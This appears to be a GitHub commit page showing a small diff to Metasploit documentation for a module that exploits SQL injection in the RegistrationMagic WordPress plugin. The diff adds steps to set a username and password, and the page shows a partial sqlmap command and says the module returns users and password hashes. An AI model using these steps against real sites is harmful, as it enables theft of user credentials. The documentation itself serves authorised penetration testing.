We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent b71f9e7 commit 00c1ac4Copy full SHA for 00c1ac4
documentation/modules/auxiliary/scanner/http/wp_registrationmagic_sqli.md
@@ -19,8 +19,10 @@ sqlmap -u 'http://<IP>/wp-admin/admin-ajax.php?page=rm_ex_chronos_edit_task&rm_f
19
2. Start msfconsole
20
3. Do: `use auxiliary/scanner/http/wp_registrationmagic_sqli`
21
4. Do: `set rhosts [ip]`
22
-5. Do: `run`
23
-6. You should get the users and hashes returned.
+5. Do: `set username [username]`
+6. Do: `set password [password]`
24
+7. Do: `run`
25
+8. You should get the users and hashes returned.
26
27
## Options
28
0 commit comments